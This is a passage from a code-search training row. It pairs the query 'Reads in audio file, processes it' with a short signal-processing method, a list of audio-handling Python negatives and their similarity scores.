play(self):\n assert pyaudio is not None, (\"You need to have pyaudio installed to \"\n \"use the play_wav function\")\n filename = os.path.join(tempfile.gettempdir(),\n '6003_wave_%s.wav' % abs(hash(tuple(self.samples))))\n self.save(filename)\n f = wave.open(filename, 'r')\n try:\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(),\n rate=f.getframerate(),\n output=True)\n\n data = f.readframes(10240)\n while data:\n stream.write(data)\n data = f.readframes(10240)\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n finally:\n f.close()\n os.unlink(filename)", "def decode_audio(fp, fs=None, mono=False, normalize=False, fastwav=False, measured = False):\n if measured:\n fp = fp.decode('latin').replace(\"clean\", \"measured\")\n\n if fastwav:\n # Read with scipy wavread (fast).\n _fs, _wav = wavread(fp)\n if fs is not None and fs != _fs:\n raise NotImplementedError('Fastwav cannot resample audio.')\n if _wav.dtype == np.int16:\n _wav = _wav.astype(np.float32)\n _wav /= 32768.\n elif _wav.dtype == np.float32:\n pass\n else:\n raise NotImplementedError('Fastwav cannot process atypical WAV files.')\n else:\n # TODO: librosa currently optional due to issue with cluster installation\n import librosa\n # Decode with librosa load (slow but supports file formats like mp3).\n _wav, _fs = librosa.core.load(fp, sr=fs, mono=False)\n if _wav.ndim == 2:\n _wav = np.swapaxes(_wav, 0, 1)\n\n assert _wav.dtype == np.float32\n\n # At this point, _wav is np.float32 either [nsamps,] or [nsamps, nch].\n # We want [nsamps, 1, nch] to mimic 2D shape of spectral feats.\n if _wav.ndim == 1:\n nsamps = _wav.shape[0]\n nch = 1\n else:\n nsamps, nch = _wav.shape\n _wav = np.reshape(_wav, [nsamps, 1, nch])\n \n # Average channels if we want monaural audio.\n if mono:\n _wav = np.mean(_wav, 2, keepdims=True)\n\n if normalize:\n _wav /= np.max(np.abs(_wav))\n\n return _wav", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, input_device_index=0, channels=1, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n num_silent = 0\n snd_started = False\n\n r = array('h')\n while 1:\n snd_data = array('h', stream.read(CHUNK_SIZE, exception_on_overflow = False))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n print(\"Sound started.\")\n snd_started = True\n\n if snd_started and num_silent> 10:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n #r = trim(r)\n #r = add_silence(r, 0.5)\n return sample_width, r", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n return librosa.load(fhandle, sr=None, mono=True)", "def play_audio(filename):\n os.system(AUDIOPLAYER + ' ' + filename)", "def read_wav_file(wave_file):\n return wavfile.read(wave_file)", "def do_play(*_args):\n print(last_wav_path)\n if last_wav_path and last_wav_path.is_file():\n threading.Thread(\n target=lambda: subprocess.check_call(\n [\"aplay\", \"-q\", str(last_wav_path)]\n )\n ).start()", "def get_audio(filepath, restrict=restrict_range, use_librosa=False, normalize=True):\n try:\n audio, fs = librosa.load(path=filepath, sr=22050)\n except Exception as e:\n fs, audio_ro = scipy.io.wavfile.read(filepath)\n audio = np.copy(audio_ro) / 32767\n if fs != 22050:\n print(\"incorrect fs\")\n return None\n # frame-wise calculation\n if restrict:\n start = start_sec * fs\n end = end_sec * fs\n audio = np.array(audio[start:end], dtype=np.float32)\n if normalize is True:\n audio = (cqt_params['normalizing_constant'] * audio) / np.std(audio[np.abs(audio > 0.00001)])\n return audio", "def load_audio_files(path, single_bar=True):\n\n audios = []\n\n for file_root, dirs, files in os.walk(path):\n for name in files:\n # be careful not to get stuck in wrong files like .DS_Store\n if not re.match(r'.*wav', name):\n continue\n name = os.path.join(file_root, name)\n data, sr = sf.read(name)\n assert sr == 44100\n\n if len(data.shape) == 2 and data.shape[1] == 2:\n data = 0.5 * (data[:, 0] + data[:, 1])\n\n # We only use the 2nd bar out of 4\n if single_bar:\n if data.shape[0] >= 4*44100:\n data = data[2*44100:4*44100]\n else:\n data = data[:2*44100]\n\n data = data.astype(np.float32)\n data = torch.from_numpy(data).unsqueeze(dim=0)\n audios.append(data)\n\n return audios", "async def audiofiles(self, ctx):\r\n files = '\"{0}\"'.format('\", \"'.join(self.audio_files))\r\n await ctx.send(\"```Available audio files :\\n{0}```\".format(files))", "def get_audio(path):\n return send_from_directory('audio', path)", "def record_audio(self):\n stream = self.audio.open(format=DEFAULT_FORMAT,\n channels=DEFAULT_CHANNELS,\n rate=DEFAULT_RATE,\n input=True,\n frames_per_buffer=DEFAULT_CHUNK_SIZE)\n\n print(\"Recording...\")\n\n for i in range(0, int(DEFAULT_RATE / DEFAULT_CHUNK_SIZE * RECORD_SECONDS)):\n data = stream.read(DEFAULT_CHUNK_SIZE)\n self.frames.append(data)\n\n print(\"Done.\")\n\n stream.stop_stream()\n stream.close()", "def wavplay(filename):\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\tprint(\"Input file does not exist. Make sure you computed the analysis/synthesis\")\n\telse:\n\t\tif sys.platform == \"linux\" or sys.platform == \"linux2\":\n\t\t # linux\n\t\t subprocess.call([\"aplay\", filename])\n\n\t\telif sys.platform == \"darwin\":\n\t\t\t# OS X\n\t\t\tsubprocess.call([\"afplay\", filename])\n\t\telse:\n\t\t\tprint(\"Platform not recognized\")", "def handle_play(self, message):\n self.audio_service.resume()", "def extract(path, quality=\"medium\"):\n\n try:\n file = ffmpeg.input(path)\n output_path = path[:-3] + \"ogg\"\n if os.path.exists(output_path):\n print(\n f\"[{colored('#','yellow')}] Audio file {colored(path2title(output_path),'green')} already exists\"\n )\n return output_path\n print(\n f\"\\n[{colored('+','green')}] Extracting audio for file %s\"\n % (colored(path2title(path), \"green\")),\n end=\"\",\n )\n from util import Animation\n\n anim = Animation()\n file.audio.output(\n output_path,\n acodec=\"libvorbis\",\n audio_bitrate=BITRATE * get_multiplier(quality),\n loglevel=0,\n ).run()\n anim.complete()\n print(\n f\"[{colored('+','green')}] Extraction completed for file %s\"\n % (colored(path2title(output_path), \"green\"))\n )\n\n except Exception as ex:\n print(\n f\"[{colored('-','red')}] There was an error extracting the audio for path {colored(path2title(output_path),'green')}: \",\n ex,\n )\n sys.exit(-1)\n\n return output_path", "def from_file(\n cls,\n audio_file,\n target_sr=None,\n int_values=False,\n offset=0,\n duration=0,\n trim=False,\n trim_ref=np.max,\n trim_top_db=60,\n trim_frame_length=2048,\n trim_hop_length=512,\n orig_sr=None,\n channel_selector=None,\n normalize_db=None,\n ref_channel=None,\n ):\n samples = None\n if isinstance(audio_file, list):\n return cls.from_file_list(\n audio_file_list=audio_file,\n target_sr=target_sr,\n int_values=int_values,\n offset=offset,\n duration=duration,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )\n\n if not isinstance(audio_file, str) or os.path.splitext(audio_file)[-1] in sf_supported_formats:\n try:\n with sf.SoundFile(audio_file, 'r') as f:\n dtype = 'int32' if int_values else 'float32'\n sample_rate = f.samplerate\n if offset > 0:\n f.seek(int(offset * sample_rate))\n if duration > 0:\n samples = f.read(int(duration * sample_rate), dtype=dtype)\n else:\n samples = f.read(dtype=dtype)\n except RuntimeError as e:\n logging.error(\n f\"Loading {audio_file} via SoundFile raised RuntimeError: `{e}`. \"\n f\"NeMo will fallback to loading via pydub.\"\n )\n\n if hasattr(audio_file, \"seek\"):\n audio_file.seek(0)\n\n if HAVE_PYDUB and samples is None:\n try:\n samples = Audio.from_file(audio_file)\n sample_rate = samples.frame_rate\n num_channels = samples.channels\n if offset > 0:\n # pydub does things in milliseconds\n seconds = offset * 1000\n samples = samples[int(seconds) :]\n if duration > 0:\n seconds = duration * 1000\n samples = samples[: int(seconds)]\n samples = np.array(samples.get_array_of_samples())\n # For multi-channel signals, channels are stacked in a one-dimensional vector\n if num_channels > 1:\n samples = np.reshape(samples, (-1, num_channels))\n except CouldntDecodeError as err:\n logging.error(f\"Loading {audio_file} via pydub raised CouldntDecodeError: `{err}`.\")\n\n if samples is None:\n libs = \"soundfile, and pydub\" if HAVE_PYDUB else \"soundfile\"\n raise Exception(f\"Your audio file {audio_file} could not be decoded. We tried using {libs}.\")\n\n return cls(\n samples,\n sample_rate,\n target_sr=target_sr,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )", "def getAudio(self):\n audioString = self.inStream.read(self.BUFFERSIZE)\n self.newAudio = True\n return numpy.fromstring(audioString, dtype=numpy.int16)", "def parse_raw(data):\n for sample in data:\n assert \"src\" in sample\n json_line = sample[\"src\"]\n obj = json.loads(json_line)\n assert \"key\" in obj\n assert \"wav\" in obj\n assert \"txt\" in obj\n key = AishellKeyMapper.encode(obj[\"key\"])\n wav_file = obj[\"wav\"]\n txt = obj[\"txt\"]\n try:\n if \"start\" in obj:\n assert \"end\" in obj\n sample_rate = torchaudio.backend.sox_io_backend.info(wav_file).sample_rate\n start_frame = int(obj[\"start\"] * sample_rate)\n end_frame = int(obj[\"end\"] * sample_rate)\n waveform, _ = torchaudio.backend.sox_io_backend.load(\n filepath=wav_file, num_frames=end_frame - start_frame, frame_offset=start_frame\n )\n else:\n waveform, sample_rate = torchaudio.load(wav_file)\n example = dict(key=key, txt=txt, wav=waveform, sample_rate=sample_rate)\n yield example\n except Exception as ex:\n logging.warning(\"Failed to read {}\".format(wav_file))", "def load_mp3(path):\r\n data, fs = librosa.core.load(path, sr=None)\r\n\r\n return fs, data", "def get_data(path):\n if path.endswith('.mp3'):\n path = prepare_file(path, path.rstrip('mp3')+'wav')\n x, sr = librosa.load(path, duration=30)\n\n else:\n x, sr = librosa.load(path, duration=30)\n directory, file_name = os.path.split(path)\n return x, sr, file_name", "def _load(self, filepath):\n import subprocess as sp\n command = ['ffmpeg',\n '-i', filepath,\n '-f', 's16le',\n '-acodec', 'pcm_s16le',\n '-ac', '1'] # channels: 2 for stereo, 1 for mono\n if self.sampling_rate != SAMPLING_RATE:\n command.extend(['-ar', str(self.sampling_rate)])\n command.append('-')\n # 30s at 44.1 kHz ~= 1.3e6\n proc = sp.run(command, stdout=sp.PIPE, bufsize=10**7, stderr=sp.DEVNULL, check=True)\n\n return np.fromstring(proc.stdout, dtype=\"int16\")", "def extract_audio(file_name, audio_directory):\n basename = os.path.splitext(os.path.basename(file_name))[0]\n audio_file_name = audio_directory + '/' + basename + '.wav'\n subprocess.call(['ffmpeg', '-y', '-i', file_name, '-ac', '1', audio_file_name])\n return audio_file_name", "def read_wav(fname, normalize=True):\n # samps_int16: N x C or N\n # N: number of samples\n # C: number of channels\n sampling_rate, samps_int16 = wavfile.read(fname)\n # N x C => C x N\n samps = samps_int16.astype(np.float)\n # tranpose because I used to put channel axis first\n if samps.ndim != 1:\n samps = np.transpose(samps)\n # normalize like MATLAB and librosa\n if normalize:\n samps = samps / MAX_INT16\n return sampling_rate, samps", "def read(self, path):\n pbase = os.path.splitext(path)[0]\n gsid = pbase.split('/')[-2]\n gender, sid = gsid[0], gsid[1:]\n assert sid in self._spkr_table\n phoneseq = phnread(pbase+'.PHN')\n wrdseq = phnread(pbase+'.WRD')\n transcrpt = txtread(pbase+'.TXT')\n sample = TIMITSpeech(\n *audioread(path), speaker=sid, gender=gender,\n transcript=transcrpt, phonemeseq=phoneseq,\n wordseq=wrdseq\n )\n #sample.phonemeseq = [\n # (t, PHONETABLE[p]) for t, p in sample.phonemeseq]\n return sample", "def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig", "def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig", "def read_wave(path):\n with contextlib.closing(wave.open(path, 'rb')) as wf:\n num_channels = wf.getnchannels()\n assert num_channels == 1\n sample_width = wf.getsampwidth()\n assert sample_width == 2\n sample_rate = wf.getframerate()\n assert sample_rate in (8000, 16000, 32000)\n pcm_data = wf.readframes(wf.getnframes())\n return pcm_data, sample_rate", "def read_audio(audio_paths, speaker_dict, tool, config, normalize, is_training,\n save_path=None, save_format='numpy',\n global_mean_male=None, global_mean_female=None,\n global_std_male=None, global_std_female=None,\n dtype=np.float32):\n if not is_training:\n if global_mean_male is None or global_mean_female is None:\n raise ValueError('Set mean & std computed in the training set.')\n if normalize not in ['global', 'speaker', 'utterance', 'no']:\n raise ValueError(\n 'normalize must be \"utterance\" or \"speaker\" or \"global\" or \"no\".')\n if tool not in ['htk', 'python_speech_features', 'librosa']:\n raise TypeError(\n 'tool must be \"htk\" or \"python_speech_features\"' +\n ' or \"librosa\".')\n\n audio_path_list_male, audio_path_list_female = [], []\n total_frame_num_male, total_frame_num_female = 0, 0\n total_frame_num_dict = {}\n speaker_mean_dict = {}\n\n # NOTE: 講演ごとに異なるspeakerとみなす\n\n # Loop 1: Computing global mean and statistics\n if is_training and normalize != 'no':\n print('=====> Reading audio files...')\n for i, audio_path in enumerate(tqdm(audio_paths)):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio file into utterances\n _, input_utt_sum, speaker_mean, _, total_frame_num_speaker = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n if i == 0:\n # Initialize global statistics\n feature_dim = input_utt_sum.shape[0]\n global_mean_male = np.zeros((feature_dim,), dtype=dtype)\n global_mean_female = np.zeros(\n (feature_dim,), dtype=dtype)\n global_std_male = np.zeros((feature_dim,), dtype=dtype)\n global_std_female = np.zeros((feature_dim,), dtype=dtype)\n\n # For computing global mean\n if speaker[3] == 'M':\n audio_path_list_male.append(audio_path)\n global_mean_male += input_utt_sum\n total_frame_num_male += total_frame_num_speaker\n elif speaker[3] == 'F':\n audio_path_list_female.append(audio_path)\n global_mean_female += input_utt_sum\n total_frame_num_female += total_frame_num_speaker\n else:\n raise ValueError\n\n # For computing speaker stddev\n if normalize == 'speaker':\n speaker_mean_dict[speaker] = speaker_mean\n total_frame_num_dict[speaker] = total_frame_num_speaker\n # NOTE: speaker mean is already computed\n\n print('=====> Computing global mean & stddev...')\n # Compute global mean per gender\n global_mean_male /= total_frame_num_male\n global_mean_female /= total_frame_num_female\n\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, _, _, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n # For computing global stddev\n if speaker[3] == 'M':\n for input_utt in input_data_dict_speaker.values():\n global_std_male += np.sum(\n np.abs(input_utt - global_mean_male) ** 2, axis=0)\n elif speaker[3] == 'F':\n for input_utt in input_data_dict_speaker.values():\n global_std_female += np.sum(\n np.abs(input_utt - global_mean_female) ** 2, axis=0)\n else:\n raise ValueError\n\n # Compute global stddev per gender\n global_std_male = np.sqrt(\n global_std_male / (total_frame_num_male - 1))\n global_std_female = np.sqrt(\n global_std_female / (total_frame_num_female - 1))\n\n if save_path is not None:\n # Save global mean & std per gender\n np.save(join(save_path, 'global_mean_male.npy'),\n global_mean_male)\n np.save(join(save_path, 'global_mean_female.npy'),\n global_mean_female)\n np.save(join(save_path, 'global_std_male.npy'),\n global_std_male)\n np.save(join(save_path, 'global_std_female.npy'),\n global_std_female)\n\n # Loop 2: Normalization and Saving\n print('=====> Normalization...')\n frame_num_dict = {}\n sampPeriod, parmKind = None, None\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n if normalize == 'speaker' and is_training:\n speaker_mean = speaker_mean_dict[speaker]\n else:\n speaker_mean = None\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, speaker_mean, speaker_std, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=is_training,\n sil_duration=0,\n tool=tool,\n config=config,\n mean=speaker_mean) # for compute speaker sttdev\n # NOTE: input_data_dict_speaker have been not normalized yet\n\n for utt_index, input_utt in input_data_dict_speaker.items():\n\n if normalize == 'no':\n pass\n elif normalize == 'global' or not is_training:\n # Normalize by mean & std over the training set per gender\n if speaker[3] == 'M':\n input_utt -= global_mean_male\n input_utt /= global_std_male\n elif speaker[3] == 'F':\n input_utt -= global_mean_female\n input_utt /= global_std_female\n else:\n raise ValueError\n elif normalize == 'speaker':\n # Normalize by mean & std per speaker\n input_utt = (input_utt - speaker_mean) / speaker_std\n elif normalize == 'utterance':\n # Normalize by mean & std per utterance\n utt_mean = np.mean(input_utt, axis=0, dtype=dtype)\n utt_std = np.std(input_utt, axis=0, dtype=dtype)\n input_utt = (input_utt - utt_mean) / utt_std\n else:\n raise ValueError\n\n frame_num_dict[speaker + '_' + utt_index] = input_utt.shape[0]\n\n if save_path is not None:\n # Save input features\n if save_format == 'numpy':\n input_data_save_path = mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.npy')\n np.save(input_data_save_path, input_utt)\n elif save_format == 'htk':\n if sampPeriod is None:\n _, sampPeriod, parmKind = read(audio_path)\n write(input_utt,\n htk_path=mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.htk'),\n sampPeriod=sampPeriod,\n parmKind=parmKind)\n else:\n raise ValueError('save_format is numpy or htk.')\n\n if save_path is not None:\n # Save the frame number dictionary\n with open(join(save_path, 'frame_num.pickle'), 'wb') as f:\n pickle.dump(frame_num_dict, f)\n\n return (global_mean_male, global_mean_female,\n global_std_male, global_std_female, frame_num_dict)", "def play_music1(music_file):\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"Music file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! (%s)\" % (music_file, pygame.get_error()))\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def _read_data_into_packet(self, p):\n\n length = p.length * self.disc.audio_format.bytes_per_frame\n\n if p.file_pos is None:\n # Silence, so send on null bytes to player\n p.data = '\\0' * length\n\n else:\n file_pos = p.file_pos * self.disc.audio_format.bytes_per_frame\n self.audio_file.seek(file_pos)\n\n p.data = self.audio_file.read(length)\n length -= len(p.data)\n file_pos += len(p.data)\n\n # If we didn't get all data, iterate with a timeout until\n # it's all been read or the ripping process has stopped.\n # This is not very efficient, and there's a small race\n # condition at the end of the disc, but this should be\n # very rare so keep it unoptimised for now.\n\n while length > 0 and self.is_ripping and self.is_ripping.is_set():\n time.sleep(1)\n\n self.audio_file.seek(file_pos)\n d = self.audio_file.read(length)\n\n length -= len(d)\n file_pos += len(d)\n\n p.data += d\n\n # Still didn't get all data, treat it as an exception\n if length > 0:\n raise SourceError('unexpected end of file, expected at least {0} bytes'\n .format(length))", "def load_audio(fhandle: BinaryIO, sr=None) -> Tuple[np.ndarray, float]:\n audio, sr = librosa.load(fhandle, sr=sr, mono=True)\n return audio, sr", "def make_audio(audio_path):\n content, sample_rate = librosa.load(audio_path, sr=16000)\n del sample_rate\n if content.dtype in (np.float32, np.float64):\n content = (content * np.iinfo(np.int16).max).astype(np.int16)\n return speech.RecognitionAudio(content=content.tobytes())", "def load_audio(self):\n\n self.audio_file = tkFileDialog.askopenfilename()\n self.audio_parser = AudioFileParser(self.audio_file)\n\n self.audio_entries = self.audio_parser.entries\n\n for index, entry in enumerate(self.audio_parser.entries):\n self.audio_box.insert(index, entry.word)", "def read(f, normalized=False):\r\n a = pydub.AudioSegment.from_mp3(f)\r\n y = np.array(a.get_array_of_samples())\r\n if a.channels == 2:\r\n y = y.reshape((-1, 2))\r\n if normalized:\r\n return a.frame_rate, np.float32(y) / 2**15\r\n else:\r\n return a.frame_rate, y", "def playmusic(self, soundfile):\n clock = pygame.time.Clock()\n pygame.mixer.music.load(soundfile)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n clock.tick(FRAMERATE)", "def modulated_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n\n data = np.fromfile(file_name, dtype = np.uint8)\n wave = custom.modulate(data)\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n stream.write(wave)\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def run(self) -> None:\n self._running = True\n while self._running:\n self._ist_mut.acquire()\n self.buff = np.zeros(params.BUF)\n for i in self.ist:\n self.buff += np.asarray(struct.unpack('f'*params.BUF, i.read(params.BUF)))\n self.buff /= len(self.ist)\n self._ist_mut.release()\n self.buff = self.transf.apply_all(self.buff)\n self._sou_mut.acquire()\n dels = []\n for i, s in enumerate(self.sounds):\n so_raw = s.read(params.BUF)\n if so_raw == b'':\n dels.append(i)\n continue\n so = np.asarray(struct.unpack(s.format*(len(so_raw)//s.f_size), so_raw)).astype(np.float32)\n so /= 2**(8*s.f_size-1)\n so = np.hstack((so, np.zeros(params.BUF-len(so))))*s.amp\n self.buff = np.average([self.buff, so], axis=0, weights=[.8,.2])\n for d in reversed(dels):\n del self.sounds[d]\n self._sou_mut.release()\n raw = struct.pack('f'*len(self.buff), *self.buff)\n self._ost_mut.acquire()\n for o in self.ost:\n o.write(raw)\n self._ost_mut.release()", "def read_audio_from_stream(stream, sr=None, mono=False, duration=None, exp_format=\"wav\"):\n _, file_ext = stream.filename.rsplit('.', 1)\n ext_converter = {\n 'mp3': AudioSegment.from_mp3,\n }\n converter = ext_converter.get(file_ext)\n if not converter:\n raise InvalidUsage(f\"Invalid extension: {file_ext}\")\n\n with tempfile.NamedTemporaryFile() as ntf:\n sound = converter(stream)\n sound.export(ntf, format=exp_format)\n return read_audio(ntf.name, sr, mono, duration)", "async def transcribe_wav(args: argparse.Namespace, core: Voice2JsonCore) -> None:\n from rhasspyasr import Transcription\n\n # Make sure profile has been trained\n assert core.check_trained(), \"Not trained\"\n\n # Get speech to text transcriber for profile\n transcriber = core.get_transcriber(open_transcription=args.open, debug=args.debug)\n\n # Directory to report WAV file names relative to\n relative_dir = (\n None if args.relative_directory is None else Path(args.relative_directory)\n )\n\n try:\n if args.wav_file or args.stdin_files:\n # Read WAV file paths\n wav_files = args.wav_file\n if args.stdin_files:\n _LOGGER.debug(\"Reading file paths from stdin\")\n wav_files = itertools.chain(wav_files, sys.stdin)\n\n for wav_path_str in wav_files:\n wav_path_str = wav_path_str.strip()\n\n # Load and convert\n wav_path = Path(wav_path_str)\n _LOGGER.debug(\"Transcribing %s\", wav_path)\n\n wav_data = await core.maybe_convert_wav(wav_path.read_bytes())\n\n # Transcribe\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n if relative_dir is None:\n # Add name of WAV file to result\n result[\"wav_name\"] = wav_path.name\n else:\n # Make relative to some directory\n result[\"wav_name\"] = str(\n wav_path.absolute().relative_to(relative_dir.absolute())\n )\n\n print_json(result)\n else:\n # Read WAV data from stdin\n _LOGGER.debug(\"Reading WAV data from stdin\")\n\n if args.input_size:\n # Number of bytes is on separate line\n line = sys.stdin.buffer.readline().strip()\n if not line:\n return\n\n num_bytes = int(line)\n while num_bytes > 0:\n # Read in WAV\n wav_data = sys.stdin.buffer.read(num_bytes)\n while len(wav_data) < num_bytes:\n wav_data = sys.stdin.buffer.read(num_bytes - len(wav_data))\n\n # Transcribe\n wav_data = await core.maybe_convert_wav(wav_data)\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n print_json(result)\n\n # Next WAV\n line = sys.stdin.buffer.readline().strip()\n if not line:\n break\n\n num_bytes = int(line)\n else:\n # Load and convert entire input\n wav_data = await core.maybe_convert_wav(sys.stdin.buffer.read())\n\n # Transcribe\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n print_json(result)\n finally:\n transcriber.stop()", "def single_analyze_wav(self, filePath):\n\n tChopped, vChopped, fVals,\\\n powerFFT, peakFreqs, peakAmps = Utils.AnalyzeFFT(filePath, tChop=self.settings['processing']['tChop'],\n detail=self.settings['processing']['detail'])\n\n self.analyzeDone.emit(tChopped, vChopped, fVals, powerFFT, peakFreqs, peakAmps, filePath)\n self.update_table(peakFreqs, peakAmps)", "def read(self, filename, normalize=True):\n if self.gcp == False:\n\n\t\t filepath = self.mixed_dir + filename\n\t\t sf, time_signal = wavfile.read(filepath, mmap=True)\n\n else:\n\n blob = list(self.bucket.list_blobs(prefix=filename))[0]\n # download blob as string\n file_as_string = blob.download_as_string()\n sf, time_signal = wavfile.read(io.BytesIO(file_as_string), mmap=True)\n\n\t\tif normalize == True:\n\t\t\t\n # normalization, assuming 2^15 is the highest possible quantization\n\t\t\ttime_signal = time_signal/np.power(2,15)\n\n\t\treturn time_signal", "def load_wav(wav_file):\n rate, data = wavfile.read(wav_file)\n return rate, data", "def read_audio_from_path(path: str) ->Optional[TorchAudioTuple]:\n bytes_obj = get_bytes_obj_from_path(path)\n return read_audio_from_bytes_obj(bytes_obj)", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def read(filename):\n\n fileName, fileExtension = os.path.splitext(filename)\n wav_filename = filename\n rate, data = scipy.io.wavfile.read(str(wav_filename)) # the data is read in its native format\n if data.dtype =='int16':\n data = numpy.cast['float'](data)\n return [rate,data]", "def read_wav(filename, offset=0, nframes=None, dtype=torch.double):\n\n if nframes is None: # Load whole file\n fs, x = wavfile.read(filename, mmap=False)\n x = torch.tensor(x, dtype=dtype)\n x.unsqueeze_(dim=0)\n\n else: # Load a part\n with wave.open(filename) as f:\n fs = f.getframerate()\n f.setpos(offset)\n buff = f.readframes(nframes)\n x = torch.tensor(np.frombuffer(buff, np.int16), dtype=dtype)\n x.unsqueeze_(dim=0)\n x -= x.mean()\n\n return x.to(DEVICE), fs", "def process_sound_map():\n pass", "def map_audio(self): \n for root, dirs, files in os.walk(self.dir):\n for name in files:\n if (name.split(\".\")[-1].lower() == 'm4a' or \\\n name.split(\".\")[-1].lower() == 'mp3'):\n \n cur_path = \"{0}/{1}\".format(root, name)\n cur_file = auto.File(cur_path)\n \n artist = cur_file.artist.lower().strip()\n album = cur_file.album.lower().strip()\n title = cur_file.title.lower().strip()\n bitrate = cur_file.bitrate\n \n if not artist in self.audio_dict:\n self.audio_dict[artist] = {}\n \n if not album in self.audio_dict[artist]:\n self.audio_dict[artist][album] = {}\n \n title_key = title\n for in_album_title in self.audio_dict[artist][album]:\n if sm(None, title, in_album_title).ratio() > 0.9:\n title_key = in_album_title\n \n if not title_key in \\\n self.audio_dict[artist][album]:\n self.audio_dict[artist][album][title_key] = []\n \n self.audio_dict[artist][album][title_key].append({\n 'path': cur_path,\n 'bitrate': bitrate,\n 'file_name': name\n })\n \n return self", "def _process_audio(self, root: str, id: str) -> bool:\n path = os.path.join(root, id + \".flac\")\n si, _ = torchaudio.info(path)\n duration = (si.length / si.channels) / si.rate\n if self.max_duration is not None and duration > self.max_duration:\n return True\n self.paths.append(path)\n self.durations.append(duration)\n return False", "def play_prog(self):\r\n\r\n serial_number = range(47845, 47869)\r\n chord_number = range(1, 25)\r\n for i in self.cnv:\r\n # Look for matching audio files and play them.\r\n try:\r\n filename = \"audio files/{}__{}.wav\".format(serial_number[i-1], chord_number[i-1])\r\n playsound.playsound(filename)\r\n except FileNotFoundError:\r\n print('Error: audio files not found.')", "def _record_audio(self) -> io.BytesIO:\n frames = io.BytesIO()\n audio_stream = self.audio_interface.open(\n channels=self.channels,\n format=self.SAMPLE_FORMAT,\n frames_per_buffer=self.chunk_size,\n input=True,\n rate=self.framerate,\n stream_callback=functools.partial(\n self._fill_audio_buffer,\n frames))\n\n while audio_stream.is_active():\n pass\n\n audio_stream.stop_stream()\n audio_stream.close()\n\n return frames" ]
[ "0.7045707", "0.6956398", "0.6821181", "0.6742061", "0.6704527", "0.6699321", "0.6644113", "0.6615665", "0.64650714", "0.6453779", "0.63955903", "0.63811314", "0.63749427", "0.6367572", "0.63429946", "0.6340871", "0.633396", "0.6314544", "0.6308602", "0.6294938", "0.6285965", "0.62740135", "0.62489915", "0.623837", "0.6233427", "0.62217736", "0.6196891", "0.618415", "0.6141494", "0.6132818", "0.61327016", "0.6072964", "0.60648024", "0.6053477", "0.6053171", "0.604283", "0.6034881", "0.6016926", "0.6007087", "0.600231", "0.6001837", "0.59928614", "0.5991923", "0.5990197", "0.59824836", "0.5970262", "0.5936505", "0.5935647", "0.5932384", "0.59256643", "0.59164584", "0.5911463", "0.59061843", "0.58888954", "0.588063", "0.5877161", "0.5876366", "0.58651054", "0.5862576", "0.58527976", "0.5828484", "0.5814212", "0.580452", "0.5789877", "0.5788685", "0.5775275", "0.5768632", "0.5764965", "0.5760695", "0.5758041", "0.5740839", "0.5739856", "0.57366556", "0.57348984", "0.57348984", "0.5731569", "0.5728181", "0.57270306", "0.57072973", "0.56976074", "0.5685951", "0.56839347", "0.568042", "0.5676626", "0.56749207", "0.5664367", "0.5664219", "0.5659049", "0.56504446", "0.5648043", "0.5646563", "0.56454086", "0.5641915", "0.56326896", "0.56307846", "0.56233025", "0.5617952", "0.56137264", "0.5613083", "0.5612471" ]
0.72694874
0
Reads in audio file, processes it
def process_signal(self, sig, sr): return self._extract_function(sig, sr)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
